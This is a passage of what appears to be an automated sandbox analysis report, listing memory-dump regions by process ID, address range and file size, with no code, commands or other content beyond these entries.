                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/184-203-0x0000000000C10000-0x0000000000C1E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                56KB

                                                                                                                                              • memory/184-204-0x000000000A3F0000-0x000000000A3F1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/208-211-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/208-209-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/296-170-0x0000023F3A890000-0x0000023F3A900000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/296-321-0x0000023F3AF40000-0x0000023F3AFB0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/728-228-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/728-215-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/728-230-0x000000000A6F0000-0x000000000A6F1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/760-275-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/988-354-0x0000000000402F68-mapping.dmp
                                                                                                                                              • memory/1000-222-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1000-213-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1004-168-0x000001BC0FB00000-0x000001BC0FB70000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1004-237-0x000001BC12100000-0x000001BC12201000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/1004-135-0x00007FF709C04060-mapping.dmp
                                                                                                                                              • memory/1036-178-0x000001B2B3800000-0x000001B2B3870000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1100-176-0x000001D443270000-0x000001D4432E0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1140-315-0x000001AD13890000-0x000001AD138DB000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                300KB

                                                                                                                                              • memory/1140-163-0x000001AD13840000-0x000001AD1388B000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                300KB

                                                                                                                                              • memory/1140-316-0x000001AD13B00000-0x000001AD13B70000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1140-164-0x000001AD13900000-0x000001AD13970000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1176-184-0x000001A7DCAB0000-0x000001A7DCB20000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1252-276-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1252-282-0x0000000000600000-0x0000000000612000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1252-281-0x00000000005D0000-0x00000000005E0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/1396-180-0x000001F8395B0000-0x000001F839620000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1408-186-0x000001B0F0AA0000-0x000001B0F0B10000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/1508-292-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                3.5MB

                                                                                                                                              • memory/1508-290-0x00000001401FBC30-mapping.dmp
                                                                                                                                              • memory/1568-126-0x0000000000620000-0x0000000000621000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1568-129-0x00000000025F0000-0x000000000260C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                112KB

                                                                                                                                              • memory/1568-162-0x000000001B260000-0x000000001B262000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/1568-130-0x0000000002610000-0x0000000002611000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1568-128-0x0000000000D30000-0x0000000000D31000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1568-120-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1680-323-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1688-366-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/1868-182-0x0000022DD8260000-0x0000022DD82D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2088-327-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2264-194-0x0000000000340000-0x0000000000341000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2264-206-0x0000000000C20000-0x0000000000C21000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2264-234-0x0000000007A60000-0x0000000007A61000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2264-229-0x00000000026C0000-0x00000000026C1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2264-205-0x0000000000BE0000-0x0000000000C0B000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/2264-346-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2264-191-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2264-240-0x0000000008140000-0x0000000008141000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2264-199-0x0000000000C90000-0x0000000000C91000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2296-131-0x00000000008A0000-0x00000000009A1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/2296-132-0x00000000009B0000-0x0000000000A0C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                368KB

                                                                                                                                              • memory/2296-119-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2400-174-0x000002B85DC80000-0x000002B85DCF0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2420-172-0x00000180CA120000-0x00000180CA190000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2712-319-0x000001D7007A0000-0x000001D700810000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2712-167-0x000001D700370000-0x000001D7003E0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2720-190-0x000002426F220000-0x000002426F290000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2728-188-0x0000019964560000-0x00000199645D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                448KB

                                                                                                                                              • memory/2796-345-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/2880-116-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3188-351-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3200-353-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3736-360-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3872-350-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/3960-357-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4124-241-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4124-243-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                              • memory/4136-369-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4156-252-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4156-245-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4172-367-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4180-247-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4180-253-0x0000000002AA0000-0x0000000002AA2000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4188-343-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4232-262-0x0000000000C70000-0x0000000000C72000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4232-273-0x0000000000C74000-0x0000000000C75000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4232-269-0x0000000000C72000-0x0000000000C74000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4232-254-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4300-274-0x0000000002765000-0x0000000002767000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4300-271-0x0000000002764000-0x0000000002765000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4300-270-0x0000000002762000-0x0000000002764000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4300-259-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4300-263-0x0000000002760000-0x0000000002762000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4368-289-0x00000000035E0000-0x0000000003628000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                288KB

                                                                                                                                              • memory/4368-264-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4368-267-0x0000000000580000-0x000000000058D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                52KB

                                                                                                                                              • memory/4420-364-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4424-358-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4476-337-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4652-279-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4672-304-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4872-291-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4900-300-0x0000028245F90000-0x0000028245FB0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/4900-293-0x00000001402CA898-mapping.dmp
                                                                                                                                              • memory/4900-297-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                7.0MB

                                                                                                                                              • memory/4944-328-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4968-309-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/4968-313-0x00000000008FE000-0x00000000009FF000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/4968-314-0x0000000004320000-0x000000000437C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                368KB

                                                                                                                                              • memory/4984-359-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5020-295-0x0000000000401480-mapping.dmp
                                                                                                                                              • memory/5020-299-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                284KB

                                                                                                                                              • memory/5024-356-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5028-294-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5064-363-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5092-362-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5180-317-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5272-339-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5300-349-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5368-361-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5428-348-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5480-355-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5588-340-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5684-301-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5780-298-0x0000000002E40000-0x0000000002E84000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                272KB

                                                                                                                                              • memory/5780-283-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5796-305-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5876-286-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5940-338-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/5960-368-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6056-365-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6088-347-0x0000000000000000-mapping.dmp
                                                                                                                                              • memory/6112-352-0x0000000000000000-mapping.dmp